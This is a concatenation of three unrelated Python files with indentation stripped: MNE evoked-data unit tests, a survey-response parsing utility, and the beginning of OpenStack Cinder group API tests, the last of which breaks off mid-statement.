for offset in (0, 1):
ev_ep_decim = epochs.copy().decimate(decim, offset).average()
ev_decim = epochs.average().decimate(decim, offset)
expected_times = epochs.times[offset::decim]
assert_allclose(ev_decim.times, expected_times)
assert_allclose(ev_ep_decim.times, expected_times)
expected_data = epochs.get_data()[:, :, offset::decim].mean(axis=0)
assert_allclose(ev_decim.data, expected_data)
assert_allclose(ev_ep_decim.data, expected_data)
assert_equal(ev_decim.info['sfreq'], sfreq_new)
assert_array_equal(ev_decim.times, expected_times)
@requires_version('scipy', '0.14')
def test_savgol_filter():
"""Test savgol filtering."""
h_freq = 10.
evoked = read_evokeds(fname, 0)
freqs = fftpack.fftfreq(len(evoked.times), 1. / evoked.info['sfreq'])
data = np.abs(fftpack.fft(evoked.data))
match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
assert_raises(ValueError, evoked.savgol_filter, evoked.info['sfreq'])
evoked_sg = evoked.copy().savgol_filter(h_freq)
data_filt = np.abs(fftpack.fft(evoked_sg.data))
# decent in pass-band
assert_allclose(np.mean(data[:, match_mask], 0),
np.mean(data_filt[:, match_mask], 0),
rtol=1e-4, atol=1e-2)
# suppression in stop-band
assert_true(np.mean(data[:, mismatch_mask]) >
np.mean(data_filt[:, mismatch_mask]) * 5)
# original preserved
assert_allclose(data, np.abs(fftpack.fft(evoked.data)), atol=1e-16)
def test_hash_evoked():
"""Test evoked hashing."""
ave = read_evokeds(fname, 0)
ave_2 = read_evokeds(fname, 0)
assert_equal(hash(ave), hash(ave_2))
# do NOT use assert_equal here, failing output is terrible
assert_true(pickle.dumps(ave) == pickle.dumps(ave_2))
ave_2.data[0, 0] -= 1
assert_not_equal(hash(ave), hash(ave_2))
@slow_test
def test_io_evoked():
"""Test IO for evoked data (fif + gz) with integer and str args."""
tempdir = _TempDir()
ave = read_evokeds(fname, 0)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
# This not being assert_array_equal due to windows rounding
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave.times, ave2.times)
assert_equal(ave.nave, ave2.nave)
assert_equal(ave._aspect_kind, ave2._aspect_kind)
assert_equal(ave.kind, ave2.kind)
assert_equal(ave.last, ave2.last)
assert_equal(ave.first, ave2.first)
assert_true(repr(ave))
# test compressed i/o
ave2 = read_evokeds(fname_gz, 0)
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-8))
# test str access
condition = 'Left Auditory'
assert_raises(ValueError, read_evokeds, fname, condition, kind='stderr')
assert_raises(ValueError, read_evokeds, fname, condition,
kind='standard_error')
ave3 = read_evokeds(fname, condition)
assert_array_almost_equal(ave.data, ave3.data, 19)
# test read_evokeds and write_evokeds
aves1 = read_evokeds(fname)[1::2]
aves2 = read_evokeds(fname, [1, 3])
aves3 = read_evokeds(fname, ['Right Auditory', 'Right visual'])
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), aves1)
aves4 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))
for aves in [aves2, aves3, aves4]:
for [av1, av2] in zip(aves1, aves):
assert_array_almost_equal(av1.data, av2.data)
assert_array_almost_equal(av1.times, av2.times)
assert_equal(av1.nave, av2.nave)
assert_equal(av1.kind, av2.kind)
assert_equal(av1._aspect_kind, av2._aspect_kind)
assert_equal(av1.last, av2.last)
assert_equal(av1.first, av2.first)
assert_equal(av1.comment, av2.comment)
# test warnings on bad filenames
fname2 = op.join(tempdir, 'test-bad-name.fif')
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
write_evokeds(fname2, ave)
read_evokeds(fname2)
assert_naming(w, 'test_evoked.py', 2)
# constructor
assert_raises(TypeError, Evoked, fname)
# MaxShield
fname_ms = op.join(tempdir, 'test-ave.fif')
assert_true(ave.info['maxshield'] is False)
ave.info['maxshield'] = True
ave.save(fname_ms)
assert_raises(ValueError, read_evokeds, fname_ms)
with warnings.catch_warnings(record=True) as w:
aves = read_evokeds(fname_ms, allow_maxshield=True)
assert_true(all('Elekta' in str(ww.message) for ww in w))
assert_true(all(ave.info['maxshield'] is True for ave in aves))
with warnings.catch_warnings(record=True) as w:
aves = read_evokeds(fname_ms, allow_maxshield='yes')
assert_equal(len(w), 0)
assert_true(all(ave.info['maxshield'] is True for ave in aves))
def test_shift_time_evoked():
""" Test for shifting of time scale."""
tempdir = _TempDir()
# Shift backward
ave = read_evokeds(fname, 0)
ave.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
# Shift forward twice the amount
ave_bshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_bshift.shift_time(0.2, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_bshift)
# Shift backward again
ave_fshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_fshift.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_fshift)
ave_normal = read_evokeds(fname, 0)
ave_relative = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_relative.data,
atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave_normal.times, ave_relative.times, 10)
assert_equal(ave_normal.last, ave_relative.last)
assert_equal(ave_normal.first, ave_relative.first)
# Absolute time shift
ave = read_evokeds(fname, 0)
ave.shift_time(-0.3, relative=False)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_absolute = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_absolute.data,
atol=1e-16, rtol=1e-3))
assert_equal(ave_absolute.first, int(-0.3 * ave.info['sfreq']))
def test_evoked_resample():
"""Test for resampling of evoked data."""
tempdir = _TempDir()
# upsample, write it out, read it in
ave = read_evokeds(fname, 0)
sfreq_normal = ave.info['sfreq']
ave.resample(2 * sfreq_normal, npad=100)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_up = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
# compare it to the original
ave_normal = read_evokeds(fname, 0)
# and compare the original to the downsampled upsampled version
ave_new = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_new.resample(sfreq_normal, npad=100)
assert_array_almost_equal(ave_normal.data, ave_new.data, 2)
assert_array_almost_equal(ave_normal.times, ave_new.times)
assert_equal(ave_normal.nave, ave_new.nave)
assert_equal(ave_normal._aspect_kind, ave_new._aspect_kind)
assert_equal(ave_normal.kind, ave_new.kind)
assert_equal(ave_normal.last, ave_new.last)
assert_equal(ave_normal.first, ave_new.first)
# for the above to work, the upsampling just about had to, but
# we'll add a couple extra checks anyway
assert_true(len(ave_up.times) == 2 * len(ave_normal.times))
assert_true(ave_up.data.shape[1] == 2 * ave_normal.data.shape[1])
def test_evoked_detrend():
"""Test for detrending evoked data."""
ave = read_evokeds(fname, 0)
ave_normal = read_evokeds(fname, 0)
ave.detrend(0)
ave_normal.data -= np.mean(ave_normal.data, axis=1)[:, np.newaxis]
picks = pick_types(ave.info, meg=True, eeg=True, exclude='bads')
assert_true(np.allclose(ave.data[picks], ave_normal.data[picks],
rtol=1e-8, atol=1e-16))
@requires_pandas
def test_to_data_frame():
"""Test evoked Pandas exporter."""
ave = read_evokeds(fname, 0)
assert_raises(ValueError, ave.to_data_frame, picks=np.arange(400))
df = ave.to_data_frame()
assert_true((df.columns == ave.ch_names).all())
df = ave.to_data_frame(index=None).reset_index('time')
assert_true('time' in df.columns)
assert_array_equal(df.values[:, 1], ave.data[0] * 1e13)
assert_array_equal(df.values[:, 3], ave.data[2] * 1e15)
def test_evoked_proj():
"""Test SSP proj operations."""
for proj in [True, False]:
ave = read_evokeds(fname, condition=0, proj=proj)
assert_true(all(p['active'] == proj for p in ave.info['projs']))
# test adding / deleting proj
if proj:
assert_raises(ValueError, ave.add_proj, [],
{'remove_existing': True})
assert_raises(ValueError, ave.del_proj, 0)
else:
projs = deepcopy(ave.info['projs'])
n_proj = len(ave.info['projs'])
ave.del_proj(0)
assert_true(len(ave.info['projs']) == n_proj - 1)
# Test that already existing projections are not added.
ave.add_proj(projs, remove_existing=False)
assert_true(len(ave.info['projs']) == n_proj)
ave.add_proj(projs[:-1], remove_existing=True)
assert_true(len(ave.info['projs']) == n_proj - 1)
ave = read_evokeds(fname, condition=0, proj=False)
data = ave.data.copy()
ave.apply_proj()
assert_allclose(np.dot(ave._projector, data), ave.data)
def test_get_peak():
"""Test peak getter."""
evoked = read_evokeds(fname, condition=0, proj=True)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=1)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmax=0.9)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=0.02,
tmax=0.01)
assert_raises(ValueError, evoked.get_peak, ch_type='mag', mode='foo')
assert_raises(RuntimeError, evoked.get_peak, ch_type=None, mode='foo')
assert_raises(ValueError, evoked.get_peak, ch_type='misc', mode='foo')
ch_name, time_idx = evoked.get_peak(ch_type='mag')
assert_true(ch_name in evoked.ch_names)
assert_true(time_idx in evoked.times)
ch_name, time_idx = evoked.get_peak(ch_type='mag',
time_as_index=True)
assert_true(time_idx < len(evoked.times))
assert_equal(ch_name, 'MEG 1421')
data = np.array([[0., 1., 2.],
[0., -3., 0]])
times = np.array([.1, .2, .3])
ch_idx, time_idx = _get_peak(data, times, mode='abs')
assert_equal(ch_idx, 1)
assert_equal(time_idx, 1)
ch_idx, time_idx = _get_peak(data * -1, times, mode='neg')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
ch_idx, time_idx = _get_peak(data, times, mode='pos')
assert_equal(ch_idx, 0)
assert_equal(time_idx, 2)
assert_raises(ValueError, _get_peak, data + 1e3, times, mode='neg')
assert_raises(ValueError, _get_peak, data - 1e3, times, mode='pos')
def test_drop_channels_mixin():
"""Test channels-dropping functionality."""
evoked = read_evokeds(fname, condition=0, proj=True)
drop_ch = evoked.ch_names[:3]
ch_names = evoked.ch_names[3:]
ch_names_orig = evoked.ch_names
dummy = evoked.copy().drop_channels(drop_ch)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
dummy2 = evoked.copy().drop_channels([drop_ch[0]])
assert_equal(dummy2.ch_names, ch_names_orig[1:])
evoked.drop_channels(drop_ch)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
for ch_names in ([1, 2], "fake", ["fake"]):
assert_raises(ValueError, evoked.drop_channels, ch_names)
def test_pick_channels_mixin():
"""Test channel-picking functionality."""
evoked = read_evokeds(fname, condition=0, proj=True)
ch_names = evoked.ch_names[:3]
ch_names_orig = evoked.ch_names
dummy = evoked.copy().pick_channels(ch_names)
assert_equal(ch_names, dummy.ch_names)
assert_equal(ch_names_orig, evoked.ch_names)
assert_equal(len(ch_names_orig), len(evoked.data))
evoked.pick_channels(ch_names)
assert_equal(ch_names, evoked.ch_names)
assert_equal(len(ch_names), len(evoked.data))
evoked = read_evokeds(fname, condition=0, proj=True)
assert_true('meg' in evoked)
assert_true('eeg' in evoked)
evoked.pick_types(meg=False, eeg=True)
assert_true('meg' not in evoked)
assert_true('eeg' in evoked)
assert_true(len(evoked.ch_names) == 60)
def test_equalize_channels():
"""Test equalization of channels."""
evoked1 = read_evokeds(fname, condition=0, proj=True)
evoked2 = evoked1.copy()
ch_names = evoked1.ch_names[2:]
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
my_comparison = [evoked1, evoked2]
equalize_channels(my_comparison)
for e in my_comparison:
assert_equal(ch_names, e.ch_names)
def test_arithmetic():
"""Test evoked arithmetic."""
ev = read_evokeds(fname, condition=0)
ev1 = EvokedArray(np.ones_like(ev.data), ev.info, ev.times[0], nave=20)
ev2 = EvokedArray(-np.ones_like(ev.data), ev.info, ev.times[0], nave=10)
# combine_evoked([ev1, ev2]) should be the same as ev1 + ev2:
# data should be added according to their `nave` weights
# nave = ev1.nave + ev2.nave
with warnings.catch_warnings(record=True): # deprecation no weights
ev = combine_evoked([ev1, ev2])
assert_equal(ev.nave, ev1.nave + ev2.nave)
assert_allclose(ev.data, 1. / 3. * np.ones_like(ev.data))
# with same trial counts, a bunch of things should be equivalent
for weights in ('nave', 'equal', [0.5, 0.5]):
ev = combine_evoked([ev1, ev1], weights=weights)
assert_allclose(ev.data, ev1.data)
assert_equal(ev.nave, 2 * ev1.nave)
ev = combine_evoked([ev1, -ev1], weights=weights)
assert_allclose(ev.data, 0., atol=1e-20)
assert_equal(ev.nave, 2 * ev1.nave)
ev = combine_evoked([ev1, -ev1], weights='equal')
assert_allclose(ev.data, 0., atol=1e-20)
assert_equal(ev.nave, 2 * ev1.nave)
ev = combine_evoked([ev1, -ev2], weights='equal')
expected = int(round(1. / (0.25 / ev1.nave + 0.25 / ev2.nave)))
assert_equal(expected, 27) # this is reasonable
assert_equal(ev.nave, expected)
# default comment behavior if evoked.comment is None
old_comment1 = ev1.comment
old_comment2 = ev2.comment
ev1.comment = None
ev = combine_evoked([ev1, -ev2], weights=[1, -1])
assert_equal(ev.comment.count('unknown'), 2)
assert_true('-unknown' in ev.comment)
assert_true(' + ' in ev.comment)
ev1.comment = old_comment1
ev2.comment = old_comment2
# equal weighting
ev = combine_evoked([ev1, ev2], weights='equal')
assert_allclose(ev.data, np.zeros_like(ev1.data))
# combine_evoked([ev1, ev2], weights=[1, 0]) should yield the same as ev1
ev = combine_evoked([ev1, ev2], weights=[1, 0])
assert_equal(ev.nave, ev1.nave)
assert_allclose(ev.data, ev1.data)
# simple subtraction (like in oddball)
ev = combine_evoked([ev1, ev2], weights=[1, -1])
assert_allclose(ev.data, 2 * np.ones_like(ev1.data))
assert_raises(ValueError, combine_evoked, [ev1, ev2], weights='foo')
assert_raises(ValueError, combine_evoked, [ev1, ev2], weights=[1])
# grand average
evoked1, evoked2 = read_evokeds(fname, condition=[0, 1], proj=True)
ch_names = evoked1.ch_names[2:]
evoked1.info['bads'] = ['EEG 008'] # test interpolation
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
gave = grand_average([evoked1, evoked2])
assert_equal(gave.data.shape, [len(ch_names), evoked1.data.shape[1]])
assert_equal(ch_names, gave.ch_names)
assert_equal(gave.nave, 2)
assert_raises(ValueError, grand_average, [1, evoked1])
def test_array_epochs():
"""Test creating evoked from array."""
tempdir = _TempDir()
# creating
rng = np.random.RandomState(42)
data1 = rng.randn(20, 60)
sfreq = 1e3
ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
types = ['eeg'] * 20
info = create_info(ch_names, sfreq, types)
evoked1 = EvokedArray(data1, info, tmin=-0.01)
# save, read, and compare evokeds
tmp_fname = op.join(tempdir, 'evkdary-ave.fif')
evoked1.save(tmp_fname)
evoked2 = read_evokeds(tmp_fname)[0]
data2 = evoked2.data
assert_allclose(data1, data2)
assert_allclose(evoked1.times, evoked2.times)
assert_equal(evoked1.first, evoked2.first)
assert_equal(evoked1.last, evoked2.last)
assert_equal(evoked1.kind, evoked2.kind)
assert_equal(evoked1.nave, evoked2.nave)
# now compare with EpochsArray (with single epoch)
data3 = data1[np.newaxis, :, :]
events = np.c_[10, 0, 1]
evoked3 = EpochsArray(data3, info, events=events, tmin=-0.01).average()
assert_allclose(evoked1.data, evoked3.data)
assert_allclose(evoked1.times, evoked3.times)
assert_equal(evoked1.first, evoked3.first)
assert_equal(evoked1.last, evoked3.last)
assert_equal(evoked1.kind, evoked3.kind)
assert_equal(evoked1.nave, evoked3.nave)
# test kind check
assert_raises(TypeError, EvokedArray, data1, info, tmin=0, kind=1)
assert_raises(ValueError, EvokedArray, data1, info, tmin=0, kind='mean')
# test match between channels info and data
ch_names = ['EEG %03d' % (i + 1) for i in range(19)]
types = ['eeg'] * 19
info = create_info(ch_names, sfreq, types)
assert_raises(ValueError, EvokedArray, data1, info, tmin=-0.01)
def test_time_as_index():
"""Test time as index."""
evoked = read_evokeds(fname, condition=0).crop(-.1, .1)
assert_array_equal(evoked.time_as_index([-.1, .1], use_rounding=True),
[0, len(evoked.times) - 1])
def test_add_channels():
"""Test evoked splitting / re-appending channel types."""
evoked = read_evokeds(fname, condition=0)
evoked.info['buffer_size_sec'] = None
hpi_coils = [{'event_bits': []},
{'event_bits': np.array([256, 0, 256, 256])},
{'event_bits': np.array([512, 0, 512, 512])}]
evoked.info['hpi_subsystem'] = dict(hpi_coils=hpi_coils, ncoil=2)
evoked_eeg = evoked.copy().pick_types(meg=False, eeg=True)
evoked_meg = evoked.copy().pick_types(meg=True)
evoked_stim = evoked.copy().pick_types(meg=False, stim=True)
evoked_eeg_meg = evoked.copy().pick_types(meg=True, eeg=True)
evoked_new = evoked_meg.copy().add_channels([evoked_eeg, evoked_stim])
assert_true(all(ch in evoked_new.ch_names
for ch in evoked_stim.ch_names + evoked_meg.ch_names))
evoked_new = evoked_meg.copy().add_channels([evoked_eeg])
assert_true(ch in evoked_new.ch_names for ch in evoked.ch_names)
assert_array_equal(evoked_new.data, evoked_eeg_meg.data)
assert_true(all(ch not in evoked_new.ch_names
for ch in evoked_stim.ch_names))
# Now test errors
evoked_badsf = evoked_eeg.copy()
evoked_badsf.info['sfreq'] = 3.1415927
evoked_eeg = evoked_eeg.crop(-.1, .1)
assert_raises(RuntimeError, evoked_meg.add_channels, [evoked_badsf])
assert_raises(AssertionError, evoked_meg.add_channels, [evoked_eeg])
assert_raises(ValueError, evoked_meg.add_channels, [evoked_meg])
assert_raises(AssertionError, evoked_meg.add_channels, evoked_badsf)
def test_evoked_baseline():
"""Test evoked baseline."""
evoked = read_evokeds(fname, condition=0, baseline=None)
# Here we create a data_set with constant data.
evoked = EvokedArray(np.ones_like(evoked.data), evoked.info,
evoked.times[0])
# Mean baseline correction is applied, since the data is equal to its mean
# the resulting data should be a matrix of zeroes.
evoked.apply_baseline((None, None))
assert_allclose(evoked.data, np.zeros_like(evoked.data))
run_tests_if_main()
| |
import copy
def print_first(number,thing):
if not hasattr(thing, '__iter__'):
msg = "print_first_10: can't iterate over given thing..."
print(msg)
raise(Exception(msg))
return
thing_len = len(thing)
if thing_len == 0:
msg = "Thing has no elements..."
print(msg)
return
else:
iter_length = min(number, thing_len)
if type(thing) is dict:
count = 0
for k,v in thing.iteritems():
print("{}: {}".format(k,v))
count += 1
if count > iter_length:
break
else:
for t in thing[0:iter_length]:
print(t)
def get_num_questions(question_types):
count = 0
numerical_questions = []
for question_type in question_types:
if question_type == "numerical":
numerical_questions.append(count)
count+=1
return numerical_questions
def get_question_title(number, data):
first_response = data[0]
question = first_response[number]
title = question[0]
return title
def get_responses_to_numbers(question_nums, data):
responses = []
for n in question_nums:
responses.append(get_responses_to_number(n, data))
return responses
def extract_vals_from_responses(*args):
assert(len(args) > 0)
return_val = []
for response_list in args:
clean_response_list = []
for response in response_list:
clean_response_list.append(response[2])
return_val.append(clean_response_list)
return return_val
def extract_responses_from_profiles(question_num, *args):
assert(len(args) > 0)
return_val = []
for profile_list in args:
clean_profile_list = []
for profile in profile_list:
clean_profile_list.append(profile[question_num])
return_val.append(clean_profile_list)
return return_val
def get_question_num_with_title(title, data):
profile = data[0]
count = 0
for answer in profile:
if answer[0] == title:
return count
count+=1
raise Error("No question with title found!")
def get_indexes_of_invalid_repsonse_types(allowed_types, *response_lists):
return_val = []
for response_list in response_lists:
invalid_indexes = []
count = 0
for response in response_list:
if type(response) not in allowed_types:
invalid_indexes.append(count)
count+=1
return_val.append(invalid_indexes)
return return_val
def merge_invalid_indexes(*invalid_indexes_lists):
maxes = []
for invalid_indexes_list in invalid_indexes_lists:
if len(invalid_indexes_list) > 0:
maxes.append(max(invalid_indexes_list))
if len(maxes) > 0:
maximum = max(maxes)
else:
return []
final_list = []
for i in xrange(maximum+1):
found = False
for l in invalid_indexes_lists:
if i in l and not found:
final_list.append(i)
found = True
return final_list
def remove_entries_at_indexes(indexes, *lists):
return_val = []
for l in lists:
new_l = copy.copy(l)
count = 0
for index in indexes:
try:
del new_l[index - count]
except IndexError as e:
print("Index error, trying to access index {} for list len {}".format(
index-count, len(new_l)
))
print(new_l)
print(indexes)
raise e
count+=1
return_val.append(new_l)
return return_val
def get_responses_to_number(question_num, data):
responses = []
for entry in data:
responses.append(entry[question_num])
return responses
community_matcher = (
("Athletics", "athletics"), ("Greek Life", "greek life"),
("Honors", "honors"), ("Student Life / RA", "student life / ra"),
("Service Clubs", "service clubs"),
("Academically-Oriented Clubs (ACS, Tri Beta, Phi Eta Sigma, Pre-Law, etc.)",
"academic clubs"),
("Spiritual Life", "spiritual life"),
("Not Listed", "not listed")
)
groups_matcher = (
("caucasians", "caucasian"),
("racial minorities", "racial minority"),
("people with disabilities", "disability"),
("people who identify as LGBT", "LGBT"),
("people of non-standard college age", "non_standard_age"),
("Men", "man"),
("Women", "woman"),
("athletes", "athlete"),
("individuals in Greek Life", "greek_life"),
("Honors Program Students", "honors"),
("Not listed", "not_listed")
)
sexual_assalt_matcher = (
("am someone who has", "experienced"),
("know someone who has", "know_someone")
)
def parse_communities(community_string):
return parse_list_agruments(community_string, community_matcher)
def parse_discrim_demographic(string):
discrim_demographic_matcher = (
("age", "age"), ("race", "race"), ("gender", "gender"),
("sexuality", "sexuality"), ("financial status", "financial_status"),
("place of birth", "place_of_birth"), ("disability", "disability"),
("involvement / lack of involvement with specific groups on campus",
"campus_group_associations")
)
return parse_list_agruments(string, discrim_demographic_matcher)
def parse_discrim_involvement(string):
return parse_list_agruments(string, community_matcher)
def parse_groups(string):
return parse_list_agruments(string, groups_matcher)
def parse_sexual_assault(string):
return parse_list_agruments(string, sexual_assalt_matcher)
def parse_list_agruments(string, matcher_dict):
list = []
if len(string) == 0:
return list
string_remainder = string
remaining_len = len(string_remainder)
#print("Starting comminity parsing")
for k,v in matcher_dict:
#print("Checking for '{}'".format(v))
#print("string_remainder: {}".format(string_remainder))
k_len = len(k)
if remaining_len < k_len:
#print("remaining_len < k_len, continuing")
continue
if k == string_remainder[:k_len]:
#print("Match! {}".format(k))
list.append(v)
if (remaining_len - k_len) > 0:
string_remainder = string_remainder[k_len + 2:]
remaining_len = len(string_remainder)
return list
| |
# Copyright (C) 2016 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for group API.
"""
from unittest import mock
import ddt
from cinder import context
from cinder import exception
import cinder.group
from cinder import objects
from cinder.objects import fields
from cinder.policies import group_snapshots as g_snap_policies
from cinder import quota
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import fake_volume
from cinder.tests.unit import test
from cinder.tests.unit import utils
GROUP_QUOTAS = quota.GROUP_QUOTAS
@ddt.ddt
class GroupAPITestCase(test.TestCase):
"""Test Case for group API."""
def setUp(self):
super(GroupAPITestCase, self).setUp()
self.group_api = cinder.group.API()
self.ctxt = context.RequestContext(fake.USER_ID, fake.PROJECT_ID,
auth_token=True,
is_admin=True)
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
@mock.patch('cinder.objects.Group.get_by_id')
def test_get(self, mock_group_get):
fake_group = {'name': 'fake_group'}
mock_group_get.return_value = fake_group
grp = self.group_api.get(self.ctxt, fake.GROUP_ID)
self.assertEqual(fake_group, grp)
@ddt.data(True, False)
@mock.patch('cinder.objects.GroupList.get_all')
@mock.patch('cinder.objects.GroupList.get_all_by_project')
def test_get_all(self, is_admin, mock_get_all_by_project,
mock_get_all):
self.group_api.LOG = mock.Mock()
fake_groups = ['fake_group1', 'fake_group2']
fake_groups_by_project = ['fake_group1']
mock_get_all.return_value = fake_groups
mock_get_all_by_project.return_value = fake_groups_by_project
if is_admin:
grps = self.group_api.get_all(self.ctxt,
filters={'all_tenants': True})
self.assertEqual(fake_groups, grps)
else:
grps = self.group_api.get_all(self.user_ctxt)
self.assertEqual(fake_groups_by_project, grps)
@mock.patch('cinder.volume.rpcapi.VolumeAPI.delete_group')
@mock.patch('cinder.db.volume_get_all_by_generic_group')
@mock.patch('cinder.db.volumes_update')
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.db.group_type_get')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_create_delete(self, mock_volume_types_get,
mock_group_type_get, mock_group,
mock_update_quota, mock_cast_create_group,
mock_volumes_update, mock_volume_get_all,
mock_rpc_delete_group):
mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova', host=None,
name=name, description=description,
status=fields.GroupStatus.CREATING)
mock_group.return_value = grp
ret_group = self.group_api.create(self.ctxt, name, description,
fake.GROUP_TYPE_ID,
[fake.VOLUME_TYPE_ID],
availability_zone='nova')
self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
ret_group.host = "test_host@fakedrv#fakepool"
ret_group.status = fields.GroupStatus.AVAILABLE
ret_group.assert_not_frozen = mock.Mock(return_value=True)
ret_group.group_snapshots = []
self.group_api.delete(self.ctxt, ret_group, delete_volumes=True)
mock_volume_get_all.assert_called_once_with(mock.ANY, ret_group.id)
mock_volumes_update.assert_called_once_with(self.ctxt, [])
mock_rpc_delete_group.assert_called_once_with(self.ctxt, ret_group)
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.objects.Group')
@mock.patch('cinder.db.group_type_get_by_name')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_create_with_group_name(self, mock_volume_types_get,
mock_group_type_get, mock_group,
mock_update_quota, mock_cast_create_group):
mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
name = "test_group"
description = "this is a test group"
grp = utils.create_group(self.ctxt, group_type_id=fake.GROUP_TYPE_ID,
volume_type_ids=[fake.VOLUME_TYPE_ID],
availability_zone='nova', host=None,
name=name, description=description,
status=fields.GroupStatus.CREATING)
mock_group.return_value = grp
ret_group = self.group_api.create(self.ctxt, name, description,
"fake-grouptype-name",
[fake.VOLUME_TYPE_ID],
availability_zone='nova')
self.assertEqual(grp.obj_to_primitive(), ret_group.obj_to_primitive())
mock_group_type_get.assert_called_once_with(self.ctxt,
"fake-grouptype-name")
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.db.group_type_get')
@mock.patch('cinder.db.group_type_get_by_name')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_create_with_uuid_format_group_type_name(
self, mock_volume_types_get, mock_group_type_get_by_name,
mock_group_type_get, mock_update_quota, mock_cast_create_group):
uuid_format_type_name = fake.UUID1
mock_volume_types_get.return_value = [{'id': fake.VOLUME_TYPE_ID}]
mock_group_type_get.side_effect = exception.GroupTypeNotFound(
group_type_id=uuid_format_type_name)
mock_group_type_get_by_name.return_value = {'id': fake.GROUP_TYPE_ID}
ret_group = self.group_api.create(self.ctxt, "test_group", '',
uuid_format_type_name,
[fake.VOLUME_TYPE_ID],
availability_zone='nova')
self.assertEqual(ret_group["group_type_id"],
fake.GROUP_TYPE_ID)
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.db.group_type_get_by_name')
@mock.patch('cinder.db.sqlalchemy.api._volume_type_get')
@mock.patch('cinder.db.sqlalchemy.api._volume_type_get_by_name')
def test_create_with_uuid_format_volume_type_name(
self, mock_vol_t_get_by_name, mock_vol_types_get_by_id,
mock_group_type_get, mock_update_quota, mock_cast_create_group):
uuid_format_name = fake.UUID1
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
volume_type = {'id': fake.VOLUME_TYPE_ID, 'name': uuid_format_name}
mock_vol_types_get_by_id.side_effect = exception.VolumeTypeNotFound(
volume_type_id=uuid_format_name)
mock_vol_t_get_by_name.return_value = volume_type
group = self.group_api.create(self.ctxt, "test_group",
"this is a test group",
"fake-grouptype-name",
[uuid_format_name],
availability_zone='nova')
self.assertEqual(group["volume_type_ids"],
[volume_type['id']])
@mock.patch('cinder.group.api.API._cast_create_group')
@mock.patch('cinder.group.api.API.update_quota')
@mock.patch('cinder.db.group_type_get_by_name')
@mock.patch('cinder.db.volume_types_get_by_name_or_id')
def test_create_with_multi_types(self, mock_volume_types_get,
mock_group_type_get,
mock_update_quota,
mock_cast_create_group):
volume_types = [{'id': fake.VOLUME_TYPE_ID},
{'id': fake.VOLUME_TYPE2_ID}]
mock_volume_types_get.return_value = volume_types
mock_group_type_get.return_value = {'id': fake.GROUP_TYPE_ID}
volume_type_names = ['fake-volume-type1', 'fake-volume-type2']
name = "test_group"
description = "this is a test group"
group = self.group_api.create(self.ctxt, name, description,
"fake-grouptype-name",
volume_type_names,
availability_zone='nova')
self.assertEqual(group["volume_type_ids"],
